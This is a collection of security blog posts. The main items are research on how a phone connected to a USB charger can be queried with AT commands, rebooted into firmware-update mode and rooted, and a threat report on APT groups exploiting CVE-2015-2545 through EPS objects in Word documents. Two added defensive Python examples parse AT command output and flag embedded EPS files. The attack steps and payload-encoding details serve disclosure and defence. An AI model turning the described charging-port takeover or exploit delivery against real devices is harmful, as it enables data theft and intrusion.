This is all well and good – technologies make our world more convenient, and talking to someone face-to-face on the other side of the planet can seem like magic! But any magic has a dark side to it. Child molesters, fraudsters, trolls, perverts and other nefarious characters can spoil the life of a child or teenager who doesn’t stick to the rules of conduct on social networks. Read more here about how children and teenagers should behave on the social networks to protect themselves from malicious users.

Computer games

Children have always played games. However, in recent decades real-life games have been almost completely superseded by computer games.

Today’s computer games are products of advanced technologies; they are realistic, social, absorbing, spectacular creations by designers and script writers. It comes as little surprise that gaming sites around the world come second in terms of popularity among children and teenagers.

Popularity of the “Internet communication media” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Computer games are least popular in Japan, Italy and Mexico. However, in these countries there are different reasons for this. Game consoles such as Sony PlayStation and Nintendo are widespread in Japan, where they are manufactured. In Mexico and Italy, judging by our statistics, kids and teens simply prefer social networks to computer games.

Steam is one of the gaming sites most often visited by children and teenagers. It is in fact more than a mere online gaming store – it is a large gaming community where kids and teens can talk to fellow gamers, find new friends, read news and, naturally, purchase games and share their in-game achievements.

Steam’s homepage

As can be seen in the statistics of websites visited by children, Minecraft is another gaming website that children and teens often visit. Minecraft can be seen as an educational (edutainment) game, and in some countries it is even part of the school curriculum, within the framework of the MinecraftEdu project.

The time that your child spends playing computer games needs to be regulated. Overindulging in games can lead to dependency. This is especially relevant for so-called infinite games that are limited to one game plot and do not have a beginning or end. Massively multiplayer online role-playing games (MMORPGs) fall under this category. There are known cases where overuse of MMORPGs has led to psychological harm, gaming addiction and even death by exhaustion.

Parents should also take note of what games their child is playing, the age ratings and the contents of the game, as well as the kind of skills they develop.

Computer games are not bad, but it’s better for children to spend their time productively.

Alcohol, tobacco, narcotics

The popularity of websites in the “Alcohol, tobacco, narcotics” category came as a bit of a surprise. Children in Germany (22.79%) and the UK (25.37%) show most interest in this topic.

Popularity of the “Alcohol, tobacco and narcotics” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

However, a child can encounter this topic just about anywhere on the Internet. For example, in all types of teenager blogs it is not uncommon to see a picture of a girl with a bong, or pictures glorifying vodka.

Publications in social media promoting the consumption of alcohol, tobacco or drugs

Similar messages often occur on different entertainment sites, such as 9gag.

Images published on the website 9gag

In recent years, “legal highs” have become widespread, and can be easily purchased online. The authorities in different countries have trouble keeping up with and blocking the hundreds of new legal-high websites that appear online every day. Social media also contains numerous offers to buy “legal” narcotics.

Online shop selling “legal highs”

Synthetic drugs are by no means legal, let alone safe. The effect of consuming “spice” and “salts” is unpredictable and can lead to serious harm.

Electronic commerce

The popularity of this category shows just how interested children are in online shopping.

Popularity of the “Electronic commerce” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

As we can see, children and teenagers in China, Japan and the US visit online shops more frequently than others. Judging by the list of websites most often reported by the Parental Control module, the most popular online shops are Taobao in China, Uniqlo in Japan, and Amazon in the US.

Software, audio and video

An interesting trend can be seen in the “Software, audio, video” category. Over the last year and a half, visits by children and teenagers to websites where they can download or watch films and cartoons or listen to music have doubled.

Popularity of the “Software, audio, video” category in different countries, January 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

On the face of it, this website category doesn’t seem to be a big deal. However, you shouldn’t forget about illegal software and malware – it may not hurt your child, but could cause quite a bit of damage to your computer.

Popularity of the “Software, audio, video” category in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

Children in Japan watch cartoons and listen to music online more often than their peers in other countries. The figures for Russia and Mexico are the lowest. In Russia, this may be due to the fact that most young users listen to music on the VKontakte social network.

According to Kaspersky Lab’s Parental Control statistics, YouTube is the most popular website in this category.


The popularity of certain types of websites among children in different countries could be linked to each country’s cultural peculiarities and economic conditions.

If we look at the entire global picture, there is a downward trend in the popularity of Internet communication media among children and teenagers. The underlying reason is the increasing use of mobile technologies and the availability of smartphones in developed countries, the emergence of convenient mobile social media and Internet communication apps, and the fact that users can always stay online thanks to their mobile devices. However, in those countries where smartphones are less prevalent, children tend to use computers more often for online communications.

Interestingly, the lower the “Internet communication media” index is for a specific country, the more popular computer games are:

Popularity of the “Internet communication media” and “Computer games” categories in different countries, April 2015 – April 2016, according to Kaspersky Lab’s Parental Control statistics

It’s interesting to see that children are becoming increasingly self-sufficient online: they choose which music they want to listen to, which films or cartoons they watch, and which products they want to – possibly – purchase.

Self-reliance is a positive trait for your child, but you still need to keep tabs on what they are doing online, just like in real life. Parental control software may just be an aid to safeguard your child from undesirable content, but it could well come in very handy – so don’t just dismiss it out of hand. For example, Kaspersky Lab’s product Safe Kids not only blocks undesirable sites but also notifies the parents of any alarming search requests that a child makes, and about their activities on social media. Since Safe Kids operates on mobile devices as well, parents can also get information about where their child is.

For today’s children, and especially teenagers, the Internet is their natural habitat. We do everything we can to keep it safe.

BerlinSides …electrifying!

Malware Alerts - Mon, 05/30/2016 - 05:57

It was the last weekend of May and, just like every year, hackers, forensic experts and pentesters met at the University Hall in Berlin for the BerlinSides conference: ‘A con from hacker for hacker’. This year’s motto is ‘electrifying’ and the badges and shirts show a picture of Nikola Tesla.

BerlinSides is the successor of the PH-Neutral conference held by FX, who once said he’s going to host his conference for ten years. After that, Aluc stepped in and now runs the BerlinSides conference since 2010.

It started right after the PXE conference ended on Friday 27th of May and lasts for four days. As usual, the last day is labelled “OpSec 4 Nerds” and held in a Dojo. It’s about “hand to hand combat” and optional for all attendees who have good health insurance. Today is the last day of the conference and the exercises in the Dojo are going on right now.

The schedule of the conference can be found here:

In contrast to the Chaos Computer Congress, this conference is by invitation only and just like in Las Vegas, what’s happening inside of BerlinSides stays inside. No journalists, cameras or any recording devices are allowed. Speakers can go into details and give some unique insights in projects, incidents and new vulnerabilities.

0x100 people attended the conference this year and beside the talks I also enjoyed the networking, music and party. I met people I haven’t seen for a while, some I never met before and we had some good discussions.

Kaspersky Lab is the premium sponsor of this year’s conference and we are happy to see such great events and to support the community.

My colleague Stefan Ortloff held the opening talk named “Cross-Platform Malware To Attack The Bitcoin-Sphere” and gave some insights in an ongoing investigation conducted by himself.

(Host Aluc on the right, me on the left side)

Due to the nature of this conference, there aren’t any further details I can add to this blog, but I’d like to thank Aluc for his commitment and I look forward to attending again next year!

Wired Mobile Charging – Is it Safe?

Malware Alerts - Thu, 05/26/2016 - 06:56

Mobile phones. Nowadays, they are our constant companions, our confidants. They know everything about our everyday lives. Every day, whether we’re on our way to or from work or just wandering around the city, mobile phones collect this information. We take photos, share our impressions on social networks, send work and non-work related mails, text messages, and make calls. All this information makes our smartphones a treasure trove for data thieves.

And we are confident that all this data is secure.

Manufacturers assure us that their devices and the data on them are safe. They release updates containing security fixes.

We also take steps to protect our privacy. Tinkering users install custom firmware, discover operating system mechanisms, acquire root access to have deeper control over their phone and use software that, according to them, is more secure and convenient.

The average user who prefers to just use his phone without digging any deeper, sets a PIN code, a complex password or fingerprint scanner, and sticks to official app stores.

Most users believe these measures make their data safe. But is that really the case?

The following experiment shows that sometimes just charging your device can get you into trouble.

Data transmission

A while ago I started to dig a bit deeper into what happens when you connect your phone to your computer. Usually, when your phone is protected, you will only see the phone name on your PC. If it has no PIN/password, you’ll be able to access all the media files on the device.

The amount of data exchanged varies depending on the manufacturer, OS version and low-level firmware. But data is always present, even on a phone with the latest Android OS (Marshmallow) or iOS 9.

Data transmission – comparison table

Here is a comparison table on the data exchange between a computer and connected mobile phone during the handshake. It varies depending on the mobile and desktop OS combination:


DN – Device Name
DM – Device Manufacturer
DT – Device Type
SN – Serial Number
FW – Firmware info
OS – Operating System info
FS – File system info/file list
ECID – Electronic Chip ID

Device | Device OS | Mode | Host OS | Data size (bytes) | Data type
Nexus 5 | Android 4.4 | MTP (default) | Windows 8.1 | 32 336 | DN, DM, DT, SN, FS
Nexus 5 | Android 4.4 | MTP (unblocked) | Windows 8.1 | 32 155 | DN, DM, DT, SN, FS
Nexus 5 | Android 4.4 | MTP + ADB | Windows 8.1 | 11 946 | DN, DM, SN
Nexus 5 | Android 4.4 | MTP (default) | Windows 10 | 8 827 | DN, SN
Nexus 5 | Android 4.4 | MTP (unblocked) | Windows 10 | 242 206 | DN, SN, FS
Nexus 5 | Android 4.4 | MTP + ADB | Windows 10 | 10 582 | DN, SN, FW
Nexus 5 | Android 4.4 | MTP (default) | OSX 10.9 | 1 213 | DN, DM, DT, SN
Nexus 5 | Android 4.4 | MTP (unblocked) | OSX 10.9 | 581 | DN, DM, DT, SN
Nexus 6 | Android 6.0.1 | Charging only (default) | Windows 8.1 | 8 965 | DN, DM, SN
Nexus 6 | Android 6.0.1 | MTP (unblocked) | Windows 8.1 | 39 418 | DN, DM, DT, SN, FS
Nexus 6 | Android 6.0.1 | Charging only (default) | Windows 10 | 8 975 | DN, SN
Nexus 6 | Android 6.0.1 | MTP (unblocked) | Windows 10 | 91 342 | DN, SN, FS
Nexus 6 | Android 6.0.1 | Charging only (default) | OSX 10.9 | 14 000 | DN, DM, DT, SN
Nexus 6 | Android 6.0.1 | MTP (unblocked) | OSX 10.9 | 7 674 | DN, DM, DT, SN
Samsung Galaxy S4 | Android 5.0.1 | MTP (default) | Windows 8.1 | 4 098 | DN, DM, DT, SN
Samsung Galaxy S4 | Android 5.0.1 | MTP (default) | Windows 10 | 7 740 | DN, DM, DT, SN, FS, FW
Apple iPhone 5 | iOS 9.1 | Default (locked) | Windows 8.1 | 5 001 | DN, DM, SN
Apple iPhone 5 | iOS 9.1 | Default (locked) | OS X 10.9 | 83 272 | DN, DM, DT, SN, OS, ECID, device public key
Apple iPhone 5 | iOS 9.1 | Unblocked + Paired | Windows 8.1 | 1 829 145 | UniqueChipID, device class, iOS version, SessionID, device model, File System total size, File system free space
Apple iPhone 5 | iOS 9.1 | Unblocked + Paired | OS X 10.9 | 23 223 | DN, DM, DT, SN, OS, ECID, device public key

All in all, that’s quite a fair amount of information about the device.

What else?

While I was conducting this minor research, I stumbled upon one very peculiar feature in a smartphone from a very popular manufacturer. I found out that while installing the CDC driver (I was using a normal Windows PC and completely standard microUSB cable) this phone also installs a COM-port, labelling it as a modem. At first glance it doesn’t look like anything unusual. However, this phone had no USB tethering enabled, and no Developer mode or ADB (USB debugging) enabled either.

This COM-port is available for connection using default methods.

So, we reached the modem. Or not. What we reached is probably just an interface layer that allows us to talk to the modem; it’s not a direct connection.

Now for the theory. Android consists of different layers, one of which is RIL. RIL stands for Radio Interface Layer. It is responsible for allowing Application level apps (e.g. Android telephony framework) to interact with modem hardware via specific commands (both send requests and receive answers).

To avoid going too deep into the details, I won’t describe the RIL Java sub-layer that talks to the rild daemon, or Vendor RIL. Let’s just call it RIL (Radio Interface Layer).

Historically, all modems use a command set called the Hayes command set, developed by Dennis Hayes way back in 1981. The commands used to talk to the modem are called AT commands. The commands that are available for applications to call through RIL, and for RIL to transmit to the modem, vary depending on the modem firmware limitations set by the manufacturer, RIL limitations, etc. Many manufacturers also implement their own vendor-specific commands for their modems. For example, Qualcomm uses the AT$Q<command> extension, and Infineon uses AT+X<command>.

The ATI1 to ATI9 commands return general information about the device and modem; for example, ATI1 returns the software version code.

ATI2 returns the IMEI numbers. From here we can see that the device is dual-SIM.

You can dig up more info with the other AT commands.

Digging, digging

By digging a bit further, we can find all the commands available for the modem. Note that many of them are restricted and/or require parameters and will return an “Error” otherwise.

By the way, vendor-specific commands won’t be listed here!

We can check the mobile signal level by AT+CSQ, battery level, etc.
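What actually comes back over that COM port is plain text in the Hayes/3GPP response format: an optional echo of the command, zero or more information lines, and a final result code. The following Python is an added example, not code from the original post, showing how to parse such a transcript (including the extended +CME/+CMS ERROR form) and how to turn a +CSQ value into dBm using the mapping from 3GPP TS 27.007. The transcripts are constructed; no modem is contacted.

```python
"""Added example: parse Hayes/3GPP AT command transcripts (constructed data, no modem contacted)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Final result codes defined by the Hayes command set and 3GPP TS 27.007.
FINAL_RESULT_CODES = {"OK", "ERROR", "NO CARRIER", "BUSY", "NO ANSWER", "NO DIALTONE"}
# Extended error form from 3GPP TS 27.007 / 27.005, e.g. "+CME ERROR: 3".
_EXT_ERROR_RE = re.compile(r"^\+(?:CME|CMS) ERROR: .+$")
# Information response, e.g. "+CSQ: 18,99".
_INFO_RE = re.compile(r"^\+([A-Z0-9]+): ?(.*)$")


@dataclass
class AtResponse:
    command: Optional[str]  # the echoed command line, if the modem echoes (ATE1)
    info: List[str]         # information lines between the echo and the final result code
    result: Optional[str]   # final result code, or None if the transcript is truncated

    def ok(self) -> bool:
        return self.result == "OK"


def parse_at_response(raw: bytes) -> AtResponse:
    """Split one command/response exchange into echo, information lines and final result.
    Modem output uses <CR><LF> line endings; the echoed command ends with a bare <CR>,
    so all three terminators are accepted and empty lines are dropped."""
    text = raw.decode("ascii", errors="replace")
    lines = [ln.strip() for ln in re.split(r"\r\n|\r|\n", text)]
    command: Optional[str] = None
    info: List[str] = []
    result: Optional[str] = None
    for ln in lines:
        if not ln:
            continue
        upper = ln.upper()
        if command is None and not info and upper.startswith("AT"):
            command = ln                      # echo of what the host sent
        elif upper in FINAL_RESULT_CODES or _EXT_ERROR_RE.match(upper):
            result = ln
            break                             # anything after this belongs to the next exchange
        else:
            info.append(ln)
    return AtResponse(command, info, result)


def csq_to_dbm(info_line: str) -> Optional[int]:
    """Convert a '+CSQ: <rssi>,<ber>' line to dBm as defined in 3GPP TS 27.007:
    0 = -113 dBm or less, 1..30 = -111..-53 dBm in 2 dB steps, 31 = -51 dBm or more, 99 = unknown."""
    m = _INFO_RE.match(info_line.strip())
    if not m or m.group(1) != "CSQ":
        raise ValueError("not a +CSQ response: %r" % info_line)
    rssi = int(m.group(2).split(",")[0])
    if rssi == 99:
        return None
    if not 0 <= rssi <= 31:
        raise ValueError("rssi out of range: %d" % rssi)
    return -113 + 2 * rssi


# Constructed transcripts in the shape a serial-port capture would have.
SAMPLE_CSQ = b"AT+CSQ\r\r\n+CSQ: 18,99\r\n\r\nOK\r\n"
SAMPLE_ATI = b"ATI1\r\r\nManufacturer: ExampleCorp\r\nModel: EX-100\r\nRevision: 1.0.0\r\n\r\nOK\r\n"
SAMPLE_ERR = b"AT+NOSUCH\r\r\nERROR\r\n"
SAMPLE_CME = b"AT+CPBR=1\r\r\n+CME ERROR: 3\r\n"   # phonebook read refused; 3 = "operation not allowed"

if __name__ == "__main__":
    for sample in (SAMPLE_CSQ, SAMPLE_ATI, SAMPLE_ERR, SAMPLE_CME):
        r = parse_at_response(sample)
        print(r.command, r.info, r.result)
    print("signal:", csq_to_dbm(parse_at_response(SAMPLE_CSQ).info[0]), "dBm")
```

The parser stops at the first final result code, which is what lets a host-side monitor keep its place in a stream of exchanges; a truncated capture yields `result = None` rather than a misattributed line. The refused phonebook read in the last sample is the outcome the post describes for this particular phone.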

There is also one very interesting command – a default for modems – that allows any number to be dialed regardless of whether the screen is locked or not. This is a very peculiar feature for phones locked with a PIN code, because you can usually only call an emergency service from a locked screen.

There are commands that allow you to read the SIM card’s phonebook. The phonebook is not accessible on this particular phone, but who knows about other vendors?

The scary part

You may think: “So what? What can be done with this information?” But just think about it: you can pull vendor information and firmware details, which gives you enough data to analyze the device’s security. You can find out the owner’s mobile phone number by calling your own number. By finding out the battery level you can predict how long the user will keep the charger plugged in. Not bad at all, I’d say.

But there’s more that you can do with this information.

Experimenting further I stumbled across one more command – it actually performs a phone reboot to the firmware update mode. This mode actually allows an infiltrator to perform all kinds of actions with the user’s device, given the right circumstances.

So I conducted an experiment. I restored the phone to the factory firmware, reset it to default settings to ensure no other interface like ADB was available outside.

First, I connected the phone to my computer.
Then I pulled the firmware data with AT commands, to determine the device type and OS.
After that I entered that last command I came across and the phone rebooted to the firmware update mode!

What happened next?

With the information gathered via AT commands, I identified the device.

And then I used an easy-to-use root solution as a proof-of-concept. So I found the appropriate package for the device, fired up the firmware update application, and here’s what happened next:

The update took around a minute (the file is very small). The phone rebooted to perform an actual root installation:

Root package was installed, and it cleaned itself up.

The phone rebooted again, and what do we see –

All the user’s data is safe, but now he has one more app that cannot be uninstalled with default measures, and it has root access to the file system. I checked the timer – it took a little under 3 minutes for the whole procedure, and that’s taking into account that I was pressing buttons manually.

Imagination time

Now it’s time to use your imagination. What if?

What if that package didn’t have a generic purpose (with lots of additional features), but had one specific task to install a specific application or change the device configuration?

That would make it possible to minimize the package size and script, thus reducing the installation time.

What if it installed a system daemon, instead of some package? What if it installed a backdoor? What if it was some kind of Android Trojan – which are very common nowadays – and worked in the background, sharing everything on your phone with someone sitting on the other side of the world?

What if it enabled developer mode and ADB, and added the computer’s fingerprint to a trusted database? These changes wouldn’t be detected by a security solution (if one was installed), since they are default phone functions. It also wouldn’t take very long to execute.

And what can we do from a trusted computer via ADB to the connected phone?

The answer is – a lot. We can install and delete applications. We can back up the message database, photos and videos, the applications cache and data files. And it can be done pretty fast.

And these scenarios are only those that involve data theft.

There are other possible destructive actions such as wiping the phone, deleting data, encrypting data and asking for a ransom. The possibilities are infinite.

So let’s imagine a scenario where you are on a trip and you just got off the plane after a flight of 5-8 hours. Your phone is almost dead. You find a charging station with USB – a blessing!

You connect your phone to start charging, put it down and mind your own business for 20-30 minutes, or more. Or less. It doesn’t matter.

Now look at what has been described above. How long do you think it will take for a script to perform those actions, download every bit of data from your phone and/or infect it with malware?

With that sort of data you can be hacked, you can be tracked, your data (including corporate data) can be compromised or destroyed.

Simple as that.


There are large communities around the world that specialize in exploring operating system internals, modifying them and releasing the results of their hard work to the public.

Other people use the results of this work to upgrade their devices. But there is no guarantee that the firmware they have just installed on their phone is free from vulnerabilities and backdoors. They may forget to disable the developer or debugging mode. They may be installing a hidden package, or background service for data collection and transfer.

Despite all the manufacturers’ efforts, absolute security of mobile devices is virtually unreachable.

Our experiment proves it. It has been conducted on just one vendor, but there’s nothing to say that holes like this don’t exist on the phones of other vendors. All of the above was done using public information only.

I dug around and found that this vulnerability was found at Black Hat and reported some time back in 2014. It did not create much of a buzz, as far as a search of the news and social media shows, and it still exists, even on the very latest models.

While working on this article I found that these guys also discovered this hole, to some extent.

The technique of stealing data from a mobile phone connected to a computer was used, for example, during the infamous Red October cyberespionage campaign in 2013.

The possibility of data theft from a mobile phone when using public charging spots was described by our experts in 2014. You may think it is paranoid, and that no one will bother installing malicious charging stations at airports, cafes and bus stations. But we think differently.

CVE-2015-2545: overview of current threats

Malware Alerts - Wed, 05/25/2016 - 06:56

CVE-2015-2545 is a vulnerability discovered in 2015 and corrected with Microsoft’s update MS15-099. The vulnerability affects Microsoft Office versions 2007 SP3, 2010 SP2, 2013 SP1 and 2013 RT SP1.

The flaw enables an attacker to execute arbitrary code using a specially crafted EPS image file. The exploit uses PostScript and can evade the Address Space Layout Randomization (ASLR) and Data Execution Prevention (DEP) protection mechanisms.

The exploit was discovered in the wild in August 2015, when it was used in a targeted attack by the Platinum group, presumably against targets in India. Over the following months, there was significant growth in the number of threat actors using the vulnerability as a primary tool for initial penetration, with both the attack groups and their targets located in South-East and Central Asia and the Far East.

In this research paper, we discuss examples of attacks using the CVE-2015-2545 vulnerability undertaken by some of these groups.

Overview of groups using CVE-2015-2545

Platinum (also known as TwoForOne)

The group is believed to originate from South-East Asia. Its attacks can be traced as far back as 2009. The group is notable for exploiting 0-day vulnerabilities and carrying out a small number of highly focused targeted attacks – mostly against government agencies in Malaysia, Indonesia, China and India.

This group was the first to exploit the CVE-2015-2545 vulnerability. After the vulnerability was corrected with Microsoft updates in September and November 2015, no new Platinum attacks exploiting this vulnerability have been detected.

Microsoft presented the activity of this group at the SAS conference in February 2016, and in its paper: PLATINUM: Targeted attacks in South and Southeast Asia.


The group has been known for several years and is believed to be of Chinese origin. In November and December 2015, it used a modified exploit for CVE-2015-2545 in attacks against information and news agencies in Taiwan. These attacks were described in a FireEye research paper – The EPS Awakens – Part 2.


In December 2015, Kaspersky Lab became aware of a targeted attack against the Japanese defense sector. In order to infect victims, the attacker sent an email with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office using an embedded EPS (Encapsulated PostScript) object. The EPS object contained shellcode that dropped and loaded a 32-bit or 64-bit DLL file depending on the system architecture. This, in turn, exploited another vulnerability (CVE-2015-1701) to elevate privileges to Local System and download additional malware components from the C&C server.

The C&C server used in the attack was located in Japan and appears to have been compromised. However, there is no indication that it has ever been used for any other malicious purpose. Monitoring of the server activity for a period of several months did not result in any new findings. We believe the attackers either lost access to the server or realized that it resulted in too much attention from security researchers, as the attack was widely discussed by the Japanese security community.

According to our research partner in Japan, the original EvilPost attack in December 2015 arrived as a spear-phishing email with a Word document attached.

This document embedded an EPS object file, which triggered a vulnerability in the EPS format handler in Microsoft Word. Even with an exploit component, Microsoft Word rendered the document correctly and displayed the decoy message. The document is written in good Japanese, as shown below.

The decoy was themed around New Year impressions of defense-related organizations.

This attack was also described in the FireEye report, mentioned above.

An overview of the EvilPost group’s activity was provided to subscribers of the Kaspersky Lab Threat Intelligence Service in March 2016. For information about the service, please write to


In March and April 2016, a series of emails laced with an exploit for CVE-2015-2545 were detected. The emails were sent in spear-phishing attacks, presumably targeting organizations in Hong Kong. Identifying a specific group behind these attacks is difficult because they used a new variant of a widely available backdoor known as PoisonIvy (from which the name of the group, SPIVY, is derived). A description of these incidents can be found in the Palo Alto blog.

Danti and SVCMONDR

These two groups have not yet been publicly described. An overview of their attacks and the tools used is provided in this report.

Danti attacks

Danti (Kaspersky Lab’s internal name) is an APT actor that has been active at least since 2015, predominantly targeting Indian government organizations. According to our telemetry, Danti has also been actively hitting targets in Kazakhstan, Kyrgyzstan, Uzbekistan, Myanmar, Nepal and the Philippines.

The group implemented a new campaign in February and March 2016, using a repurposed implementation of the CVE-2015-2545 exploit with custom shellcode. In order to infect the victim, the attackers distributed spear-phishing emails with an attached DOCX file exploiting the CVE-2015-2545 vulnerability in Microsoft Office. The exploit is based on a malformed embedded EPS (Encapsulated PostScript) object. This contains the shellcode that drops a backdoor, providing full access to the attackers.
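Both the EvilPost and Danti deliveries described above share one observable: a DOCX package carrying an EPS object among its embedded media. The following Python is an added defender-side example, not code from this report, that unpacks a DOCX in memory, lists embedded objects that are EPS by extension or by file header, and hashes each against the image1.eps MD5 this report gives for the Danti samples. The header check goes beyond the report: it also flags an EPS that has been renamed with an image extension. The sample document is constructed inline and contains no exploit.

```python
"""Added example: triage a DOCX for embedded EPS objects of the kind used to carry CVE-2015-2545.
Not code from the original report; the sample document is constructed inline."""
import hashlib
import io
import zipfile
from dataclasses import dataclass
from typing import List

# MD5 of image1.eps from the Danti "Mission List"/"HQ List" documents, as stated in the report.
KNOWN_BAD_EPS_MD5 = {"a90a329335fa0af64d8394b28e0f86c1"}

# Text EPS starts with a PostScript DSC header; DOS-binary EPS starts with the bytes C5 D0 D3 C6.
PS_MAGIC = b"%!PS-Adobe"
DOS_EPS_MAGIC = b"\xc5\xd0\xd3\xc6"

# Members of the OOXML package where Word stores embedded pictures and OLE objects.
EMBED_PREFIXES = ("word/media/", "word/embeddings/")


@dataclass
class EpsFinding:
    member: str        # ZIP member name inside the DOCX
    size: int
    md5: str
    by_name: bool      # extension says .eps
    by_content: bool   # file header says PostScript/EPS
    known_bad: bool    # MD5 matches an indicator from the report


def looks_like_eps(data: bytes) -> bool:
    """Content check: a PostScript DSC header or a DOS EPS binary header."""
    return data.startswith(PS_MAGIC) or data.startswith(DOS_EPS_MAGIC)


def find_embedded_eps(docx_bytes: bytes) -> List[EpsFinding]:
    """Return one finding per embedded object that is EPS by extension or by content.
    Checking the content as well as the name catches an EPS renamed to .png or .jpg,
    which a filter that only looks at extensions would miss."""
    findings: List[EpsFinding] = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.startswith(EMBED_PREFIXES):
                continue
            data = zf.read(info)
            by_name = info.filename.lower().endswith(".eps")
            by_content = looks_like_eps(data)
            if not (by_name or by_content):
                continue
            digest = hashlib.md5(data).hexdigest()
            findings.append(EpsFinding(info.filename, len(data), digest, by_name, by_content,
                                       digest in KNOWN_BAD_EPS_MD5))
    return findings


def build_sample_docx() -> bytes:
    """Constructed minimal DOCX: one harmless EPS stub renamed to .png, one PNG stub.
    Only the package members relevant to the check are included."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/media/image1.png",
                    b"%!PS-Adobe-3.0 EPSF-3.0\n%%BoundingBox: 0 0 100 100\n%%EOF\n")
        zf.writestr("word/media/image2.png", b"\x89PNG\r\n\x1a\n" + bytes(16))
    return buf.getvalue()


if __name__ == "__main__":
    for f in find_embedded_eps(build_sample_docx()):
        verdict = "KNOWN BAD" if f.known_bad else "review manually"
        print(f"{f.member}: {f.size} bytes, md5={f.md5}, by_name={f.by_name}, "
              f"by_content={f.by_content} -> {verdict}")
```

Any EPS inside a Word document is worth a second look on a mail gateway, because the EPS filter was the component Microsoft later disabled; a hash match against the indicator above is a confirmed hit, while an unknown EPS is a candidate for sandboxing rather than an automatic block.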

Main findings:

  • Danti, a previously unknown group, is probably related to NetTraveler and DragonOK
  • In February-March 2016 the group was observed using CVE-2015-2545
  • It remains active, conducting attacks against Indian diplomatic organizations
  • Related attacks have been observed against Central and South East Asia targets

The campaign leveraging the exploit for CVE-2015-2545 took place in February 2016. As a result, several emails with attached DOCX files were uploaded to VirusTotal. The email recipients were connected to the Indian Ministry of External Affairs, as can be seen below:

  •, the Foreign Service Institute, Ministry of Foreign Affairs (Under Secretary (FT/NRG),
  •, possibly related to the Chumar military post in India, a disputed area between India and China (the mail server is the same as the Indian Ministry of Foreign Affairs-
  •, the Indian embassy in Hungary
  •, the Indian Embassy in Denmark
  •, the Indian embassy in Colombia

All these attacks took place between the 2nd and 29th of February, 2016.

Target                       Date           Attachment name                    Sender
Indian embassy in Hungary    2nd February   Mission List.doc                   unknown (original email was forwarded)
Indian embassy in Denmark    2nd February   HQ List.doc                        ([])
Indian embassy in Colombia   2nd February   HQ List.doc                        ([])
DSFSI                        24th February  India’s 10 Top Luxury Hotels.doc   via ([])
Chumapost                    29th February  India’s 10 Top Luxury Hotels.doc   via ([])

In the case of the Indian Embassy in Hungary, it looks like the original message was forwarded from the embassy to the Indian IT security team in the Ministry of Foreign Affairs, and uploaded later to Virus Total.

Initial vector

The emails that were analysed had originally been sent via “3capp-mailcom-lxa06.server.lan”, perhaps using a spam-mailer program. In all known cases, the sender used the same gate at (, a well-known open relay SMTP server.

The email messages changed between waves of the campaign. When the campaign started on 2 February, the emails carried the subject headers “Mission List” and “HQ List” and forged the identity of a real sender.

Original message used in the first wave of attacks

As can be seen above, the original email was supposedly forwarded from Anil Kumar Balani, Director of the Department of Information Technology at the Indian Ministry of Communications & Information Technology.

Mission List decoy document

At the same time, attackers sent a slightly different document with the subject “HQ List” to other Indian embassies (for example, those in Denmark and Colombia):

Original HQ List email

K.Nagaraj Naidu is Director of the Investments Technology Promotion Division in the Ministry of External Affairs, and a former Counsellor (T&C) at the Embassy of India in China.

HQ List decoy document

Both files (“Mission List” and “HQ list”) have different decoy content, but both use the same CVE-2015-2545 EPS exploit (image1.eps, MD5 a90a329335fa0af64d8394b28e0f86c1).

Interestingly, as can be seen in their metadata, both files were modified by the user “India” on 01.02.2016, just one day before they were sent to targets.

“HQ List” metadata “Mission List” metadata

For the attacks at the end of February, the attackers decided to use the less relevant subject header of “10 top luxury hotels in India”, sent from an unknown sender.

Top Luxury Hotels spear-phishing email

This new attachment contains the same EPS exploit, but uses a different decoy document and a new payload.

Top 10 Luxury Hotels decoy document

The text of the document was copied from a Forbes article published in 2007. According to its metadata, the document was created in June 2015, so it has probably been used before in unknown attacks.

However, the same mail gate ( was used as for the 2nd February attacks.

Email header from February 29

Email header from February 24

All the “doc” files are Web Archive Files (single-file MHTML documents) and contain the decoy document and a malicious EPS. The structure of the Web Archive files is the same in all three cases:

Web archive structure


The attackers used at least one known 1-day exploit: the exploit for CVE-2015-2545, an EPS parsing vulnerability in the EPSIMP32.FLT module, reported by FireEye and patched by Microsoft on 8 September 2015 with MS15-099.

We are currently aware of about four different variants of the exploit.

The original one was used in August 2015 against targets in India by the Platinum (TwoForOne) APT group.

Original EPS exploit, used in August 2015

The second (which is a modified variant of the original exploit) was used in EvilPost attacks against Japan in 2015, and then reused by cybercriminals in March 2016. This variant was also used by the APT16 group (ELMER backdoor) in Taiwan in December 2015. The second variant is easily recognized by the specific strings in its EPS shellcode:

The “h:\\test.txt” string could have been forgotten by the exploit developer

The third variant was used in December 2015 against a Taiwanese organization, and in February 2016 against an Indian diplomatic organization. This variant uses different shellcode but is based on the original exploit from the Platinum (TwoForOne) APT:

Can be recognized by “add2 <eb135” substring

In the third variant, the encrypted malicious exe file and the decoy document are appended to the end of the EPS file.

The appended binary starts with the marker “PdPD” (50 64 50 44), previously used for encrypted binaries by a number of APT groups (Anchor Panda, Samurai Panda, Temper Panda).

Encrypted data at the end of the eps file

The decryption routine is a single-byte XOR (the key can be any value from “\x00” to “\xff”, so it can be brute-forced), followed by a byte-swap step in which odd bytes are exchanged for even ones over several hundred bytes at the start of the buffer.

Decrypted exe file

Decrypted decoy document

We detected a few different EPS objects in the exploit and these are analyzed below. The fourth variant of the exploit is analyzed in the “March attack” section.

Read more about EPS objects and Payload in the Appendix.

March attack

At the end of March 2016, we discovered a new wave of attacks by the Danti group against Indian governmental institutions. On March 28th, several malicious documents were sent to various recipients at the Cabinet Secretariat of the Government of India from the email account of Ms. Richa Gaharwar (<>), Deputy Secretary at the Department of Administrative Reforms and Public Grievances, the nodal agency of the Government of India.

Email sent from the account of Ms. Richa Gaharwar

The message was sent from an internal IP address using Oracle Communications Messenger. This could mean that the employee workstation used to send the malicious emails had been fully compromised.

Email header

